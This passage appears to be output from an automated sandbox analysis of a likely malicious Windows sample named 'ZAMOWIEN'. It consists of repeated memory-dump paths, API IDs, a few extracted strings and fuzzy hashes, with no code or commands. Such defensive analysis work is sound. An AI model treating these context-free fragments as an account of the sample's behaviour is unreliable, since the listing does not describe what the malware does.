                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: z
                                                                                  • API String ID: 0-1657960367
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: verifier.dll
                                                                                  • API String ID: 0-3265496382
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376CFFF8
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                  • API String ID: 0-996340685
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Flst
                                                                                  • API String ID: 0-2374792617
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f2a436978fa061be89b8e8e2587ad01f0e14b158347be1f2a4961d469b1407c4
                                                                                  • Instruction ID: 234071aec83c79a42515eb3e29325eb3cea3ffc2497bfb7fd1bff809c154eec6
                                                                                  • Opcode Fuzzy Hash: f2a436978fa061be89b8e8e2587ad01f0e14b158347be1f2a4961d469b1407c4
                                                                                  • Instruction Fuzzy Hash: 4C91F5759002298BDB10CF18CC48BE9B7B5AF0A358F1441E6ED88AF255D734EE95CF94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0bb7d22e048cef07bc9d3e22599cd65f8a494c0e103edc344799959718ee31d9
                                                                                  • Instruction ID: 5f1e0aabaafffb9a8356c5c005b3f76de56023d9e2dc548aabcc822dc82233c0
                                                                                  • Opcode Fuzzy Hash: 0bb7d22e048cef07bc9d3e22599cd65f8a494c0e103edc344799959718ee31d9
                                                                                  • Instruction Fuzzy Hash: 4891C17120CB948FD7A4DF29C494B6ABBE6BB99350F50496DA1DEC33A0DA34D845CB02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: be302c98ae61a3a63df424e600ed8b9c13ec29405b5a750353fd8a8e135f0641
                                                                                  • Instruction ID: ac224ce636f7f3c800f6d8e2ab4871e303fd0f91fa0a61e808488114aee8d7b3
                                                                                  • Opcode Fuzzy Hash: be302c98ae61a3a63df424e600ed8b9c13ec29405b5a750353fd8a8e135f0641
                                                                                  • Instruction Fuzzy Hash: C691C27120CB948FE7A4DF28C494B6ABBE6BBDC344F54496DA1DEC3760DA34D8458B02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                  • Instruction ID: 7e47c4c234e4fd6224c539fcab4b44cba2dd35b7eedd7bf44676fe963f523347
                                                                                  • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                  • Instruction Fuzzy Hash: 4271D375E0021AABDB00CF55C496ABFB7B6EF44790F50451AD820EFA61E734E945CF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f9ba479232beaed7523be1d3753522ba34fb6b78a37cfa1cbd0f565939d69e6
                                                                                  • Instruction ID: 54d2c0d8950ffb689fb185a34204d1e3c5e758d5bbeffa181f10dce974bbb68b
                                                                                  • Opcode Fuzzy Hash: 7f9ba479232beaed7523be1d3753522ba34fb6b78a37cfa1cbd0f565939d69e6
                                                                                  • Instruction Fuzzy Hash: 6A61B6B4B022159BFB158E64D884BFEB7ABAFC6370F504579E8119F280DB34D941CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                  • Instruction ID: 9ddbc1d0db6fd1ac0f3bc2d3b43556e80ff1ac9192af37c893d62ea1e2ae6385
                                                                                  • Opcode Fuzzy Hash: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                  • Instruction Fuzzy Hash: 6C81AA75A00706EFDB14CF69C580BAABBF5FF48310F10896AE995DB681D734E941CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                  • Instruction ID: c3e851dc8f154148aadbf23f6d0c1903059fbdecdb1a4254bc161d7012a1a97f
                                                                                  • Opcode Fuzzy Hash: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                  • Instruction Fuzzy Hash: 4B611875A00206FBEB11CE68C842BAE77BAEF447A4F508529E811EF290D778DA41C751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5fdebad6d92f9ad3528ac504a81ac52ed21caeb01a2100a5a0b45d1ba0b2bf1
                                                                                  • Instruction ID: 91414de32cc4a1a3863571f7915aab95c0454f82092435edf57a06a317d845b7
                                                                                  • Opcode Fuzzy Hash: a5fdebad6d92f9ad3528ac504a81ac52ed21caeb01a2100a5a0b45d1ba0b2bf1
                                                                                  • Instruction Fuzzy Hash: 4D717AB5A006A8AFCF15CFA8C990ABEBBB5FF49710F404415E841AF251D735EC42CBA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                  • Instruction ID: 6adefe3635a1e25ccb7b8e022018a6350203f68aeb2f4ded1d56ed78962d8ce1
                                                                                  • Opcode Fuzzy Hash: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                  • Instruction Fuzzy Hash: 16716B71E01609EFDB10CFA5C994EAEBBB9FF88710F104469E505EB650DB38EA45CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5db1e05e7d2b129eb4237a01ed30f281ff88c42dfcf59ea5e8b9b40e4b5d6ba1
                                                                                  • Instruction ID: 2b3756c7f9944b51659d7b9a7daeb239a61ee7cc647605590280e922628fbd92
                                                                                  • Opcode Fuzzy Hash: 5db1e05e7d2b129eb4237a01ed30f281ff88c42dfcf59ea5e8b9b40e4b5d6ba1
                                                                                  • Instruction Fuzzy Hash: C5714036200B01AFE7318F14C848F5AB7EAEF447A8F504828EA559F6E4CB75E944DB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2428044827e340d1d288571627676c6658c2519d8f3f001c7a2cd3a245cfb857
                                                                                  • Instruction ID: 4c971061e96d85ff3b206d09720a09d34e7c35070fa5af57e1e603745150891c
                                                                                  • Opcode Fuzzy Hash: 2428044827e340d1d288571627676c6658c2519d8f3f001c7a2cd3a245cfb857
                                                                                  • Instruction Fuzzy Hash: C3513675A18301CFD714CF29C0A0A2ABBEABB88750F54496EE5999B354DB34EC44CB93
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 92b0ef679984e39502935e620b02689de960ebdc277e4d5c3280fd4f252868ae
                                                                                  • Instruction ID: b1de05be78029908243136c286d4aaa89f7a6481a617f13be0de422b7c640574
                                                                                  • Opcode Fuzzy Hash: 92b0ef679984e39502935e620b02689de960ebdc277e4d5c3280fd4f252868ae
                                                                                  • Instruction Fuzzy Hash: EC51E5B12003419FE720DF65CC94F9A77E8EF84764F100A2DF951AB292D738E815CBA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cebf3374730b02e1ced9e6e4b7348cd091dce9eb6102f1c60c8ff46abb4c0c09
                                                                                  • Instruction ID: 3ec94c54cf7858fda627f7f9bbd4f8a53d1a790f9318fcd1a16408fce5352b56
                                                                                  • Opcode Fuzzy Hash: cebf3374730b02e1ced9e6e4b7348cd091dce9eb6102f1c60c8ff46abb4c0c09
                                                                                  • Instruction Fuzzy Hash: 3B41FD71280702AFD726CF29C8A0B1A77E9EF88760F11942EE51D9F690DB74D841CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                  • Instruction ID: d2179dc24729d7ea4365203c8309b3e6c2ebaedc7a5f4bc137168d17c115d3ec
                                                                                  • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                  • Instruction Fuzzy Hash: 6051FCB6600312DBDB019FA4CC50A7B77F6EF85694F414C69FA80EB250EB35D816C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 832038eb1def9ee70824a14adc681d1929d1e8fa982b3bec96a8287baf241aa0
                                                                                  • Instruction ID: a940f2efc4e40779a8ed54801b49cbb5da91c490eab12e3d81e9d8061c7d7955
                                                                                  • Opcode Fuzzy Hash: 832038eb1def9ee70824a14adc681d1929d1e8fa982b3bec96a8287baf241aa0
                                                                                  • Instruction Fuzzy Hash: 5C51D370900744DFDB20CF66C984BABFBF9BF45720F104A1EE156AB6A0C7B4A545CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
